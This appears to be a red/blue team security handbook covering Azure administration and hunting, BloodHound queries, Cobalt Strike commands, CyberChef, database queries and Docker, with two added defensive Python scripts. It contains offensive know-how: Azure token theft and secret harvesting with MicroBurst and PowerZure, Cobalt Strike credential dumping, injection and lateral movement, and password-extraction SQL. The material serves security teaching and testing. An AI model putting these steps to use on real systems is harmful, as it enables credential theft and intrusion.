az vm extension list --resource-group azure-playground-resources --vm-name azure-playground-vm

Delete VM extensions
az vm extension delete --resource-group azure-playground-resources --vm-name azure-playground-vm --name bootstrapper

Create a Batch account
az batch account create -g myresourcegroup -n mybatchaccount -l eastus

Create a Storage account
az storage account create -g myresourcegroup -n mystorageaccount -l eastus --sku Standard_LRS

Associate Batch with storage account
az batch account set -g myresourcegroup -n mybatchaccount --storage-account mystorageaccount

Authenticate directly against the batch account
az batch account login -g myresourcegroup -n mybatchaccount

Display the details of our created batch account
az batch account show -g myresourcegroup -n mybatchaccount

Create a new application
az batch application create --resource-group myresourcegroup --name mybatchaccount --application-id myapp --display-name "My Application"

Add zip files to application
az batch application package create --resource-group myresourcegroup --name mybatchaccount --application-id myapp --package-file [Link] --version 1.0

Assign the application package as the default version
az batch application set --resource-group myresourcegroup --name mybatchaccount --application-id myapp --default-version 1.0

Retrieve a list of available images and node agent SKUs
az batch pool node-agent-skus list

Create new Linux pool with VM config
az batch pool create --id mypool-linux --vm-size Standard_A1 --image canonical:ubuntuserver:16.04.0-LTS --node-agent-sku-id "[Link] 16.04"

Resize the pool to start up VMs
az batch pool resize --pool-id mypool-linux --target-dedicated 5

Check the status of the pool
az batch pool show --pool-id mypool-linux

List the compute nodes running in a pool
az batch node list --pool-id mypool-linux

If a particular node in the pool is having issues, it can be rebooted or reimaged. A typical node ID will be in the format 'tvm-xxxxxxxxxx_1-'
az batch node reboot --pool-id mypool-linux --node-id tvm-123_1-20170316t000000z

Re-allocate work to another node
az batch node delete --pool-id mypool-linux --node-list tvm-123_1-20170316t000000z tvm-123_2-20170316t000000z --node-deallocation-option requeue

Create a new job to encapsulate the tasks that we want to add
az batch job create --id myjob --pool-id mypool-linux

Add tasks to the job
az batch task create --job-id myjob --task-id task1 --application-package-references myapp#1.0 --command-line "/bin/<shell> -c /path/to/[Link]"

Add multiple tasks at once
az batch task create --job-id myjob --json-file [Link]

Update the job so it is automatically marked as completed once all the tasks are finished
az batch job set --job-id myjob --on-all-tasks-complete terminateJob

Monitor the status of the job
az batch job show --job-id myjob

Monitor the status of a task
az batch task show --job-id myjob --task-id task1

Delete a job
az batch job delete --job-id myjob

Managing Containers
#If you HAVE an SSH key, run this to create an Azure Container Service cluster (~10 mins)
az acs create -n acs-cluster -g acsrg1 -d applink789

#If you DO NOT HAVE an SSH key, run this to create an Azure Container Service cluster (~10 mins)
az acs create -n acs-cluster -g acsrg1 -d applink789 --generate-ssh-keys

List clusters under your subscription
az acs list --output table

List clusters in a resource group
az acs list -g acsrg1 --output table

Display details of a container service cluster
az acs show -g acsrg1 -n acs-cluster --output list

Scale using ACS
az acs scale -g acsrg1 -n acs-cluster --new-agent-count 4

Delete a cluster
az acs delete -g acsrg1 -n acs-cluster

REFERENCE:
[Link]
[Link]

AZURE_Defend
BLUE TEAM THREAT HUNTING CLOUD

Azure Sentinel Hunt Query Resource
[Link]
Microsoft Azure Sentinel is a scalable, cloud-native security information and event management (SIEM) and security orchestration, automation and response (SOAR) solution.

Uncoder: One common language for cyber security
[Link]
[Link] is the online translator for SIEM saved searches, filters, queries, API requests, correlation and Sigma rules, built to help SOC analysts, threat hunters and SIEM engineers. Through an easy, fast and private UI you can translate queries from one tool to another without needing access to the SIEM environment, in a matter of seconds.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel, Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP, Windows PowerShell and X-Pack Watcher.
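To make concrete what such a Sigma-to-Sentinel translation does, here is an added example (not Uncoder's code and not from the handbook) that turns a small Sigma-style detection into a KQL query; the rule itself, the logsource-to-table mapping and the handful of supported operators are assumptions of the example.

```python
import re

# Constructed Sigma-style rule, shaped as PyYAML would load it from YAML.
# It is an illustration for this example, not a rule from the handbook.
RULE = {
    "title": "Failed network logons excluding machine accounts and loopback",
    "logsource": {"product": "windows", "service": "security"},
    "detection": {
        "selection": {"EventID": [4625, 4771], "LogonType": 3},
        "filter": {"Account": "*$", "IpAddress": ["127.0.0.1", "::1"]},
        "condition": "selection and not filter",
    },
}

# Assumed logsource -> Azure Sentinel table mapping; a real translator
# carries a much larger table plus per-field renames.
TABLES = {("windows", "security"): "SecurityEvent"}


def kql_literal(value):
    """Render a scalar as a KQL literal; strings are single-quoted."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, (int, float)):
        return str(value)
    return "'" + str(value).replace("\\", "\\\\").replace("'", "\\'") + "'"


def field_expr(field, value):
    """Translate one Sigma field/value pair into a KQL boolean expression."""
    if isinstance(value, list):
        if any(isinstance(v, str) and "*" in v for v in value):
            # Wildcards cannot go inside in(); expand to an OR of tests.
            return "(" + " or ".join(field_expr(field, v) for v in value) + ")"
        op = "in" if all(isinstance(v, (int, float)) for v in value) else "in~"
        return f"{field} {op} ({', '.join(kql_literal(v) for v in value)})"
    if isinstance(value, str) and "*" in value:
        core = value.strip("*")
        if "*" in core:
            raise ValueError(f"unsupported wildcard placement in {value!r}")
        if value.startswith("*") and value.endswith("*"):
            op = "contains"
        elif value.startswith("*"):
            op = "endswith"
        else:
            op = "startswith"
        return f"{field} {op} {kql_literal(core)}"
    # Sigma string matching is case-insensitive, hence =~ rather than ==.
    op = "=~" if isinstance(value, str) else "=="
    return f"{field} {op} {kql_literal(value)}"


def selection_expr(sel):
    """A search identifier: a map is an AND of its fields, a list of maps an OR."""
    if isinstance(sel, list):
        return "(" + " or ".join(selection_expr(s) for s in sel) + ")"
    return " and ".join(field_expr(f, v) for f, v in sel.items())


def sigma_to_kql(rule):
    """Translate the rule into a Sentinel KQL query: the table, then a where
    clause built by substituting each identifier named in the condition."""
    det = rule["detection"]
    src = rule["logsource"]
    table = TABLES[(src.get("product"), src.get("service"))]
    searches = {k: v for k, v in det.items() if k != "condition"}

    def substitute(tok):
        if tok.lower() in ("and", "or", "not"):
            return tok.lower()
        if tok in ("(", ")"):
            return tok
        if tok not in searches:
            raise KeyError(f"condition references unknown identifier {tok!r}")
        return "(" + selection_expr(searches[tok]) + ")"

    tokens = re.findall(r"\(|\)|\w+", det["condition"])
    return f"{table}\n| where " + " ".join(substitute(t) for t in tokens)


if __name__ == "__main__":
    print(sigma_to_kql(RULE))
```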

REFERENCE:
[Link]
[Link]
[Link]
[Link]

AZURE_Exploit
RED TEAM EXPLOITATION CLOUD

AZURE USER LOCAL ARTIFACTS

Azure File/Folder Created Locally
#[Link] is a cleartext file containing the AccessKey; inject into the user's process to view the contents of the file
C:\Users\<USERNAME>\.Azure\[Link]

PowerShell Azure Modules Installed
#Indications the target user has installed Azure modules
C:\Program Files\WindowsPowerShell\Modules\Az.*
C:\Users\<USERNAME>\Documents\WindowsPowerShell\Modules\Az.*
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Az.*

Search for Save-AzContext Usage & File Location
#Locate the PSReadLine history file, then search it for the cmdlet
PS> (Get-PSReadLineOption).HistorySavePath
PS> Select-String -Path <\path\to\ConsoleHost_history.txt> -Pattern 'Save-AzContext'

Azure Token "CachedData:" Key Inside "TokenCache:" .JSON File
#Base64 Encoded Data; Decode it to recreate the [Link] file

Import Decoded [Link] Into Attacker Local PowerShell
#Once imported the attacker will not be prompted for user/password
PS> Import-AzContext -Path C:\path\to\decoded_TokenCache.dat

MICROBURST
SCENARIO: You've been able to obtain credentials for a privileged user for Azure AD (Owner or Contributor). You can now target this user by possibly harvesting credentials stored in Key Vaults, App Services Configurations, Automation Accounts, and Storage Accounts.

STEP 1: Install PowerShell modules and download/import MicroBurst by NetSPI:
Install-Module -Name AzureRM
Install-Module -Name Azure

[Link]
Import-Module .\Get-AzurePasswords.ps1

STEP 2: Now that the PowerShell module is imported we can execute it to retrieve all available credentials at once from Key Vaults, App Services Configurations, Automation Accounts, and Storage Accounts. You will be prompted for the user account, credentials, and subscription you'd like to use. We can pipe the output to a CSV file:
Get-AzurePasswords -Verbose | Export-Csv -Path <output.csv>

POWERZURE
PowerZure is a PowerShell script written to assist in assessing
Azure security. Functions are broken out into their context as well
as the role needed to run them.

FUNCTION | DESCRIPTION | ROLE

HELP
PowerZure -h | Displays the help menu | Any

MANDATORY
Set-Subscription | Sets the default Subscription to operate in | Reader

OPERATIONAL
Create-Backdoor | Creates a Runbook that creates an Azure account and generates a Webhook to that Runbook | Admin
Execute-Backdoor | Executes the backdoor that is created with "Create-Backdoor". Needs the URI generated from Create-Backdoor | Admin
Execute-Command | Executes a command on a specified VM | Contributor
Execute-MSBuild | Executes MSBuild payload on a specified VM. By default, Azure VMs have .NET 4.0 installed. Will run as SYSTEM. | Contributor
Execute-Program | Executes a supplied program. | Contributor
Upload-StorageContent | Uploads a supplied file to a storage share. | Contributor
Stop-VM | Stops a VM | Contributor
Start-VM | Starts a VM | Contributor
Restart-VM | Restarts a VM | Contributor
Start-Runbook | Starts a specific Runbook | Contributor
Set-Role | Sets a role for a specific user on a specific resource or subscription | Owner
Remove-Role | Removes a user from a role on a specific resource or subscription | Owner
Set-Group | Adds a user to a group | Admin

INFO GATHER
Get-CurrentUser | Returns the current logged in user name, their role + groups, and any owned objects | Reader
Get-AllUsers | Lists all users in the subscription | Reader
Get-User | Gathers info on a specific user | Reader
Get-AllGroups | Lists all groups + info within Azure AD | Reader
Get-Resources | Lists all resources in the subscription | Reader
Get-Apps | Lists all applications in the subscription | Reader
Get-GroupMembers | Gets all the members of a specific group. Group does NOT mean role. | Reader
Get-AllGroupMembers | Gathers all the group members of all the groups. | Reader
Get-AllRoleMembers | Gets all the members of all roles. Roles does not mean groups. | Reader
Get-Roles | Lists the roles in the subscription | Reader
Get-RoleMembers | Gets the members of a role | Reader
Get-Sps | Returns all service principals | Reader
Get-Sp | Returns all info on a specified service principal | Reader
Get-Apps | Gets all applications and their Ids | Reader
Get-AppPermissions | Returns the permissions of an app | Reader
Get-WebApps | Gets running web apps | Reader
Get-WebAppDetails | Gets running webapps details | Reader

SECRET GATHER
Get-KeyVaults | Lists the Key Vaults | Reader
Get-KeyVaultContents | Get the secrets from a specific Key Vault | Contributor
Get-AllKeyVaultContents | Gets ALL the secrets from all Key Vaults. | Contributor
Get-AppSecrets | Returns the application passwords or certificate credentials | Contributor
Get-AllAppSecrets | Returns all application passwords or certificate credentials (If accessible) | Contributor
Get-AllSecrets | Gets ALL the secrets from all Key Vaults and applications. | Contributor
Get-AutomationCredentials | Gets the credentials from any Automation Accounts | Contributor

DATA EXFIL
Get-StorageAccounts | Gets all storage accounts | Reader
Get-StorageAccountKeys | Gets the account keys for a storage account | Contributor
Get-StorageContents | Gets the contents of a storage container or file share | Reader
Get-Runbooks | Lists all the Runbooks | Reader
Get-RunbookContent | Reads content of a specific Runbook | Reader
Get-AvailableVMDisks | Lists the VM disks available. | Reader
Get-VMDisk | Generates a link to download a Virtual Machine's disk. The link is only available for an hour. | Contributor
Get-VMs | Lists available VMs | Reader

REFERENCE:
[Link]
[Link]
[Link]
security
[Link]
powerzure-ca70b330511a
[Link]
[Link]
[Link]

AZURE_Hardening
BLUE TEAM CONFIGURATION CLOUD

Best Practice Rules for Azure


[Link]

AZURE_Terms
RED/BLUE TEAM RECON/ADMIN CLOUD

Azure Terms Cheat Sheets


[Link]
terminology
[Link]

AZURE_Tricks
RED/BLUE TEAM RECON/ADMIN CLOUD

Azure Tips & Tricks Blog
[Link]
[Link]

BLOODHOUND
RED/BLUE TEAM RECON WINDOWS
BloodHound uses graph theory to reveal the hidden and often
unintended relationships within an Active Directory environment.
Attackers can use BloodHound to easily identify highly complex
attack paths that would otherwise be impossible to quickly
identify. Defenders can use BloodHound to identify and eliminate
those same attack paths.

BLOODHOUND CYPHER QUERIES

List all owned users
MATCH (m:User) WHERE [Link]=TRUE RETURN m
List all owned computers
MATCH (m:Computer) WHERE [Link]=TRUE RETURN m
List all owned groups
MATCH (m:Group) WHERE [Link]=TRUE RETURN m
List all High Valued Targets
MATCH (m) WHERE [Link]=TRUE RETURN m
List the groups of all owned users
MATCH (m:User) WHERE [Link]=TRUE WITH m MATCH p=(m)-[:MemberOf*1..]->(n:Group) RETURN p
Find all Kerberoastable Users
MATCH (n:User) WHERE [Link]=true RETURN n
Find All Users with an SPN/Find all Kerberoastable Users with passwords last set more than 5 years ago
MATCH (u:User) WHERE [Link]=true AND [Link] < (datetime().epochseconds - (1825 * 86400)) AND NOT [Link] IN [-1.0, 0.0] RETURN [Link], [Link] ORDER BY [Link]
Find Kerberoastable Users with a path to DA
MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE [Link] ENDS WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p
Find machines Domain Users can RDP into
MATCH p=(g:Group)-[:CanRDP]->(c:Computer) WHERE [Link] ENDS WITH '-513' RETURN p
Find what groups can RDP
MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p
Find groups that can reset passwords (Warning: Heavy)
MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p
Find groups that have local admin rights (Warning: Heavy)
MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p
Find all users that have local admin rights
MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p
Find all active Domain Admin sessions
MATCH (n:User)-[:MemberOf]->(g:Group) WHERE [Link] ENDS WITH '-512' MATCH p = (c:Computer)-[:HasSession]->(n) RETURN p
Find all computers with Unconstrained Delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
Find all computers with unsupported operating systems
MATCH (H:Computer) WHERE [Link] =~ '.*(2000|2003|2008|xp|vista|7|me).*' RETURN H
Find users that logged in within the last 90 days
MATCH (u:User) WHERE [Link] > (datetime().epochseconds - (90 * 86400)) AND NOT [Link] IN [-1.0, 0.0] RETURN u
Find users with passwords last set within the last 90 days
MATCH (u:User) WHERE [Link] > (datetime().epochseconds - (90 * 86400)) AND NOT [Link] IN [-1.0, 0.0] RETURN u
Find constrained delegation
MATCH p=(u:User)-[:AllowedToDelegate]->(c:Computer) RETURN p
Find computers that allow unconstrained delegation that AREN'T domain controllers.
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE [Link] ENDS WITH '-516' WITH COLLECT([Link]) AS domainControllers MATCH (c2:Computer {unconstraineddelegation:true}) WHERE NOT [Link] IN domainControllers RETURN c2
Return the name of every computer in the database where at least one SPN for the computer contains the string 'MSSQL'
MATCH (c:Computer) WHERE ANY (x IN [Link] WHERE toUpper(x) CONTAINS 'MSSQL') RETURN c
View all GPOs
MATCH (n:GPO) RETURN n
View all groups that contain the word 'admin'
MATCH (n:Group) WHERE [Link] CONTAINS 'ADMIN' RETURN n
Find users that can be AS-REP roasted
MATCH (u:User {dontreqpreauth: true}) RETURN u
Find All Users with an SPN/Find all Kerberoastable Users with passwords last set > 5 years ago
MATCH (u:User) WHERE [Link]=true AND [Link] < (datetime().epochseconds - (1825 * 86400)) AND NOT [Link] IN [-1.0, 0.0] RETURN u
Show all high value target's groups
MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p
Find groups that contain both users and computers
MATCH (c:Computer)-[r:MemberOf*1..]->(groupsWithComps:Group) WITH groupsWithComps MATCH (u:User)-[r:MemberOf*1..]->(groupsWithComps) RETURN DISTINCT(groupsWithComps) AS groupsWithCompsAndUsers
Find Kerberoastable users who are members of high value groups
MATCH (u:User)-[r:MemberOf*1..]->(g:Group) WHERE [Link]=true AND [Link]=true RETURN u
Find Kerberoastable users and where they are AdminTo
OPTIONAL MATCH (u1:User) WHERE [Link]=true OPTIONAL MATCH (u1)-[r:AdminTo]->(c:Computer) RETURN u1, c
Find computers with constrained delegation permissions and the corresponding targets where they are allowed to delegate
MATCH (c:Computer) WHERE [Link] IS NOT NULL RETURN c
Find if any domain user has interesting permissions against a GPO (Warning: Heavy)
MATCH p=(u:User)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p
Find if unprivileged users have rights to add members into groups
MATCH (n:User {admincount:false}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p
Find all users a part of the VPN group
MATCH p=(u:User)-[:MemberOf]->(g:Group) WHERE toUpper([Link]) CONTAINS 'VPN' RETURN p
Find users that have never logged on and account is still active
MATCH (n:User) WHERE [Link]=-1.0 AND [Link]=TRUE RETURN n
Find an object in one domain that can do something to a foreign object
MATCH p=(n)-[r]->(m) WHERE NOT [Link] = [Link] RETURN p
Find all sessions a user in a specific domain has
MATCH p=(m:Computer)-[r:HasSession]->(n:User {domain:{result}}) RETURN p

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

COBALT STRIKE
RED TEAM C2 WINDOWS
Cobalt Strike is software for Adversary Simulations and Red Team
Operations.

COMMAND | DESCRIPTION

BASIC
cancel [*file*] | Cancel a download currently in progress, wildcards accepted.
cd [directory] | Change into the specified working directory.
clear | Clear all current taskings.
cp [src] [dest] | File copy.
download [C:\filePath] | Download a file from the path on the Beacon host.
downloads | List downloads in progress.
execute-assembly | Run a local .NET executable as a Beacon post-exploitation job as your current token.
exit | Task the Beacon to exit.
help <cmd> | Display all available commands or the help for a specified command.
inject [pid] <x86|x64> | Inject a new Beacon into the specified process.
jobkill [job ID] | Kill the specified job ID.
jobs | List the running jobs.
keylogger [pid] <x86|x64> | Inject a keystroke logger into the given process ID and architecture.
link/unlink [IP address] | Link/unlink to/from a remote Beacon.
ls <C:\Path> | List the files on the specified path or the current folder.
net [session/share/localgroup/etc] | Beacon net commands implemented that don't rely on [Link].
ps | Show a process listing.
pwd | Display the current working directory for the Beacon session.
reg_query [x86|x64] [HIVE\path\to\key] | Query a specific key in the registry.
reg_query [x86|x64] [HIVE\path\to\key] [value] | Query a specific value within a registry key.
rm [file\folder] | Delete a file\folder.
screenshot [pid] <x86|x64> [runtime in seconds] | Inject a screen capture stub into the specified process/architecture for the specified number of seconds.
setenv | Set an environment variable.
shell [cmd] [arguments] | Execute a shell command using [Link].
sleep [seconds] <jitter/0-99> | Set the Beacon to sleep for the number of seconds and the associated 0-99% jitter. 0 means interactive.
upload [/path/to/file] | Upload a file from the attacker machine to the current Beacon working directory.

SPOOFING
argue [command] [fake arguments] | Add a command to the fake arguments internal list.
ppid <ID> | Set the parent process ID.
spawnto <x86/x64> <C:\process\to\[Link]> | Set the child process spawned.

MIMIKATZ
mimikatz [module::command] <args> | Format to execute a Mimikatz module. !module:: elevates to SYSTEM; @module:: forces usage of the current token.
logonpasswords | Executes the sekurlsa::logonpasswords module, which extracts hashes and plaintext passwords out of LSASS.
dcsync [[Link]] [DOMAIN\user] | Uses lsadump::dcsync to extract the hash for the specified user from a domain controller.
pth [DOMAIN\user] [NTLM hash] | Uses sekurlsa::pth to inject a user's hash into LSASS; requires local admin privileges.

DESKTOP VNC
desktop <pid> <x86|x64> <low|high> | Stage a VNC server into the memory of the current process and tunnel the connection through Beacon.

POWERSHELL
powershell-import [/path/to/script.ps1] | Import a PowerShell .ps1 script from the control server and save it in memory in Beacon.
powershell [commandlet] [arguments] | Set up a local TCP server bound to localhost and download the script; the function and any arguments are executed and output is returned.
powerpick [commandlet] [arguments] | Launch the given function using @tifkin_'s Unmanaged PowerShell, which doesn't start [Link].
psinject [pid] [arch] [commandlet] [arguments] | Inject Unmanaged PowerShell into a specific process and execute the specified command.

SESSION PASSING
dllinject [pid] | Inject a Reflective DLL into a process.
inject [pid] <x86|x64> | Inject a new Beacon into the specified process.
shinject [pid] <x86|x64> [/path/to/[Link]] | Inject shellcode, from a local file, into a process on the target.
spawn [x86|x64] [listener] | Spawn a new Beacon process to the given listener.
spawnas [DOMAIN\user] [password] [listener] | Spawn a new Beacon to the specified listener as another user.
dllload [pid] [c:\path\to\[Link]] | Load an on-disk DLL in another process.

PRIVILEGE ESCALATION
elevate | List privilege escalation exploits registered with Cobalt Strike.
elevate [exploit] [listener] | Attempt to elevate with a specific exploit.
runasadmin | List command elevator exploits registered with Cobalt Strike.
runasadmin [exploit] [command + args] | Attempt to run the specified command in an elevated context.
runas [DOMAIN\user] [password] [command] | Run a command as another user using their credentials.
spawnas [DOMAIN\user] [password] [listener] | Spawn a session as another user using their credentials.
getsystem | Impersonate a token for the SYSTEM account.
elevate svc-exe [listener] | Get SYSTEM by creating a service that runs a payload.
getprivs | Enable the privileges assigned to your current access token.

RECON
portscan [targets] [ports] | Start the port scanner job.
portscan [targets] arp | Use an ARP request to discover if a host is alive.
portscan [targets] icmp | Send an ICMP echo request to check if a target is alive.
net dclist | Find the domain controller for the domain the target is joined to.
net view | Find targets on the domain the target is joined to.
net computers | Find targets by querying computer account groups on a Domain Controller.
net localgroup \\TARGET | List the groups on another system.
net localgroup \\TARGET group name | List the members of a group on another system.

TOKENS
steal_token [process id] | Impersonate a token from an existing process.
make_token [DOMAIN\user] [password] | Generate a token that passes these credentials.
getuid | Print your current token.
rev2self | Revert back to your original token.

TICKETS
kerberos_ticket_use [/path/to/[Link]] | Inject a Kerberos ticket into the current session.
kerberos_ticket_purge | Clear any Kerberos tickets associated with your session.

LATERAL MOVEMENT
jump | List lateral movement options registered with Cobalt Strike.
jump [module] [target] [listener] | Attempt to run a payload on a remote target.
jump psexec [target] [listener] | Use a service to run a Service EXE artifact.
jump psexec64 [target] [listener] | Use a service to run a Service EXE artifact.
jump psexec_psh [target] [listener] | Use a service to run a PowerShell one-liner.
jump winrm [target] [listener] | Run a PowerShell script via WinRM.
jump winrm64 [target] [listener] | Run a PowerShell script via WinRM.
remote-exec | List remote execution modules registered with Cobalt Strike.
remote-exec [module] [target] [command + args] | Attempt to run the specified command on a remote target.
remote-exec psexec [target] [command + args] | Remote execute via Service Control Manager.
remote-exec winrm [target] [command + args] | Remote execute via WinRM (PowerShell).
remote-exec wmi [target] [command + args] | Remote execute via WMI (PowerShell).

PIVOTING
socks [PORT] | Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon.
socks stop | Disable the SOCKS proxy server.
browserpivot [pid] <x86|x64> | Proxy browser traffic through a specified Internet Explorer process.
rportfwd [bind port] [forward host] [forward port] | Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
rportfwd stop [bind port] | Disable the reverse port forward.

SSH SESSIONS
ssh [target] [user] [password] | Launch an SSH session from a Beacon on Unix targets.
ssh-key [target] [user] [/path/to/[Link]] | Launch an SSH session from a Beacon on Unix targets.
shell [cmd + arguments] | Run the command and arguments you provide.
sudo [password] [cmd + arguments] | Attempt to run a command via sudo.

INTEGRATIONS/ENHANCEMENTS
The Elevate Kit
An Aggressor Script that integrates several open source privilege
escalation exploits into Cobalt Strike.
[Link]

REFERENCE:
[Link]
[Link]
[Link]
[Link]
%20and%20Resources/Cobalt%20Strike%20-%[Link]

CYBER CHEF
BLUE TEAM FORENSICS ALL
CyberChef is a simple, intuitive web app for analyzing and decoding
data without having to deal with complex tools or programming
languages.

Example Scenarios:
o Decode a Base64-encoded string
o Convert a date and time to a different time zone
o Parse a IPv6 address
o Convert data from a hexdump, then decompress
o Decrypt and disassemble shellcode
o Display multiple timestamps as full dates
o Carry out different operations on data of different types
o Use parts of the input as arguments to operations
o Perform AES decryption, extracting the IV from the
beginning of the cipher stream
o Automatically detect several layers of nested encoding
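As an added illustration of the last two scenarios (convert from hex then decompress, and automatic detection of nested encoding), the following Python script, which is not CyberChef code and not part of the handbook, peels hex, Base64, gzip and zlib layers off a constructed sample and reports the recipe it applied, accepting a layer only when the output is printable text or a recognisable compressed container.

```python
import base64
import binascii
import gzip
import re
import string
import zlib

# Constructed sample: plaintext -> gzip -> Base64 -> hex, the kind of layered
# blob found in a phishing attachment or an obfuscated one-liner.
PLAINTEXT = b"alert: suspicious login from 203.0.113.7 at 2020-04-02T10:15:00Z"
SAMPLE = binascii.hexlify(base64.b64encode(gzip.compress(PLAINTEXT))).decode()
# Second constructed sample: plaintext -> zlib -> Base64.
SAMPLE_ZLIB = base64.b64encode(zlib.compress(b"hello world"))

PRINTABLE = set(string.printable.encode())
GZIP_MAGIC = b"\x1f\x8b"
ZLIB_MAGIC = b"\x78"


def looks_like_text(data: bytes) -> bool:
    """Accept a decoded layer as text only if it is non-empty and >95% printable."""
    if not data:
        return False
    return sum(b in PRINTABLE for b in data) / len(data) > 0.95


def try_hex(data: bytes):
    s = data.strip()
    if len(s) % 2 or not re.fullmatch(rb"[0-9a-fA-F]+", s):
        return None
    return binascii.unhexlify(s)


def try_base64(data: bytes):
    s = data.strip()
    if len(s) % 4 or not re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        return base64.b64decode(s, validate=True)
    except binascii.Error:
        return None


def try_gzip(data: bytes):
    if data[:2] != GZIP_MAGIC:
        return None
    try:
        return gzip.decompress(data)
    except (OSError, EOFError, zlib.error):
        return None


def try_zlib(data: bytes):
    if data[:1] != ZLIB_MAGIC:
        return None
    try:
        return zlib.decompress(data)
    except zlib.error:
        return None


# Ordered like a CyberChef recipe: text encodings first, then containers.
DECODERS = [("From Hex", try_hex), ("From Base64", try_base64),
            ("Gunzip", try_gzip), ("Zlib Inflate", try_zlib)]


def peel(data: bytes, max_layers: int = 8):
    """Apply the first decoder whose output is text or a known container,
    repeat until nothing applies, and return (recipe, final_bytes)."""
    recipe = []
    for _ in range(max_layers):
        for name, fn in DECODERS:
            out = fn(data)
            if out is None:
                continue
            # A compressed container is an acceptable intermediate result
            # even though it is binary; anything else must be printable.
            if looks_like_text(out) or out[:2] == GZIP_MAGIC or out[:1] == ZLIB_MAGIC:
                recipe.append(name)
                data = out
                break
        else:
            break
    return recipe, data


if __name__ == "__main__":
    steps, result = peel(SAMPLE.encode())
    print(" -> ".join(steps))
    print(result.decode())
```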

DESCRIPTION | (Win/Linux) | (Mac)
Place cursor in search field | Ctrl+Alt+f | Ctrl+Opt+f
Place cursor in input box | Ctrl+Alt+i | Ctrl+Opt+i
Place cursor in output box | Ctrl+Alt+o | Ctrl+Opt+o
Place cursor in first argument field of the next operation in the recipe | Ctrl+Alt+. | Ctrl+Opt+.
Place cursor in first argument field of the nth operation in the recipe | Ctrl+Alt+[1-9] | Ctrl+Opt+[1-9]
Disable current operation | Ctrl+Alt+d | Ctrl+Opt+d
Set/clear breakpoint | Ctrl+Alt+b | Ctrl+Opt+b
Bake | Ctrl+Alt+Space | Ctrl+Opt+Space
Step | Ctrl+Alt+' | Ctrl+Opt+'
Clear recipe | Ctrl+Alt+c | Ctrl+Opt+c
Save to file | Ctrl+Alt+s | Ctrl+Opt+s
Load recipe | Ctrl+Alt+l | Ctrl+Opt+l
Move output to input | Ctrl+Alt+m | Ctrl+Opt+m
Create a new tab | Ctrl+Alt+t | Ctrl+Opt+t
Close the current tab | Ctrl+Alt+w | Ctrl+Opt+w
Go to next tab | Ctrl+Alt+RightArrow | Ctrl+Opt+RightArrow
Go to previous tab | Ctrl+Alt+LeftArrow | Ctrl+Opt+LeftArrow

REFERENCE:

[Link]

DATABASES
RED/BLUE TEAM ADMINISTRATION WINDOWS/LINUX

DESCRIPTION | MSSQL | MySQL
Version | SELECT @@version; | SELECT @@version;
Current DB Name | SELECT DB_NAME(); | SELECT database();
List users | SELECT name FROM master..syslogins; | SELECT user FROM [Link];
List DB's | SELECT name FROM master..sysdatabases; | SELECT distinct(db) FROM [Link];
List Columns | SELECT table_catalog, column_name FROM information_schema.columns; | SHOW columns FROM mytable FROM mydb;
List Tables | SELECT table_catalog, table_name FROM information_schema.tables; | SHOW tables FROM mydb;
Extract Passwords | SELECT [Link],SL.password_hash FROM sys.sql_logins AS SL; | SELECT User,Password FROM [Link] INTO OUTFILE '/tmp/[Link]';

DESCRIPTION | ORACLE | POSTGRES
Version | SELECT user FROM dual UNION SELECT * FROM v$version; | SELECT version();
Current DB Name | SELECT global_name FROM global_name; | SELECT current_database();
List users | SELECT username FROM all_users ORDER BY username; | SELECT username FROM pg_user;
List DB's | SELECT DISTINCT owner FROM all_tables; | SELECT datname FROM pg_database;
List Columns | SELECT column_name FROM all_tab_columns WHERE table_name = 'mydb'; | SELECT column_name FROM information_schema.columns WHERE table_name='data_table';
List Tables | SELECT table_name FROM all_tables; | SELECT table_name FROM information_schema.tables;
Extract Passwords | SELECT name, password, spare4 FROM [Link]$ WHERE name='<username>'; | SELECT username, passwd FROM pg_shadow;

REFERENCE:
[Link]
tion
[Link]
[Link]

DEFAULT PASSWORDS
RED TEAM ESCALATE PRIVS ALL

REFER TO REFERENCES BELOW

REFERENCE:
[Link]
[Link]
Credentials/[Link]
[Link]
[Link]

DOCKER
RED/BLUE TEAM DEVOPS WINDOWS/LINUX/MacOS

COMMAND | DESCRIPTION

CONTAINER BASICS
docker run -p 4000:80 imgname | Start docker container
docker run -d -p 4000:80 imgname | Start docker container in detached mode
docker run -t -d --entrypoint=/bin/sh "$docker_image" | Start container with entrypoint changed
docker exec -it <container-id> sh | Enter a running container
docker cp /tmp/[Link] mycontainer:/[Link] | Upload local file to container filesystem
docker cp mycontainer:/[Link] /tmp/[Link] | Download container file to local filesystem
docker stop <hash> | Stop container
docker rm <hash> | Remove container
docker rm $(docker ps -a -q) | Remove all containers
docker kill <hash> | Force shutdown of one given container
docker login | Login to docker hub
docker tag <image> username/repo:tag | Tag <image>
docker push username/repo:tag | Push a tagged image to repo
docker run username/repo:tag | Run image from a given tag
docker build -t denny/image:test . | Create docker image

DOCKER CLEANUP
[Link] | Delete all containers
[Link] | Remove unused docker images
docker image prune -f | Docker prune images
docker volume prune -f | Docker prune volumes
docker rmi <imagename> | Remove the specified image
docker rmi $(docker images -q) | Remove all docker images
docker volume rm $(docker volume ls -qf dangling=true) | Remove orphaned docker volumes
docker rm $(docker ps --filter status=dead -qa) | Remove dead containers
